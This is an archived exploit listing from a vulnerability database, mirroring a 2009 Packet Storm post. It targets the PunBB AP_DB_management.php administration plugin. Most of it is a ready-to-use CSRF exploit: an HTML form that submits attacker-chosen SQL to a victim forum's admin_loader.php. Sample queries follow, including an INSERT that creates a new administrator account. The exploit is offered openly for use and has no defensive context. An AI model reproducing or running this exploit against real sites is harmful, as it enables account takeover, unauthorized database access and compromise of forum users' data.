Lucene search
+L

PunBB AP_DB_management.php SQL Injection

🗓️ 29 Jun 2009 00:00:00Reported by Dante90Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

PunBB AP_DB_management.php Remote SQL Injection CSRF threat exploit by Dante9

Code
`######################################################################################  
#  
#  
# Author: Dante90, WaRWolFz  
Crew #  
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90  
[0-Day] #  
# MSN: [email protected]  
#  
# Web: www.warwolfz.org  
#  
#  
#  
######################################################################################  
  
[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote  
SQL Injection CSRF Exploit By Dante90  
  
[code]  
  
<html>  
<head>  
<title>[0-Day & Priv8] PunBB Administration Plug-In  
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>  
</head>  
<body>  
<center><fieldset>  
<legend>Run SQL query</legend>  
<form name="Dante90" method="post" action="  
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php  
">  
<textarea name="this_query" rows="5" cols="50">  
  
[SQL_Injection]  
  
</textarea>  
<input type="submit" name="submit" value="Run query" />  
</form>  
</fieldset></center>  
</body>  
</html>  
  
[/code]  
  
[SQL_Injection] = Insert the SQL Injection  
  
Example of SQL Injection:  
  
[code]  
SELECT * FROM users WHERE id=2;  
  
SELECT * FROM users WHERE group_id=1;  
  
INSERT INTO users (group_id, username, password, email, num_posts,  
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',  
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',  
'1220984516');  
[/code]  
  
[NICK_NEW_ADMIN] = New Administrator's Nick  
  
[PASSWORD_NEW_ADMIN] = New Administrator's Password  
  
[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail  
  
  
Dante90  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
36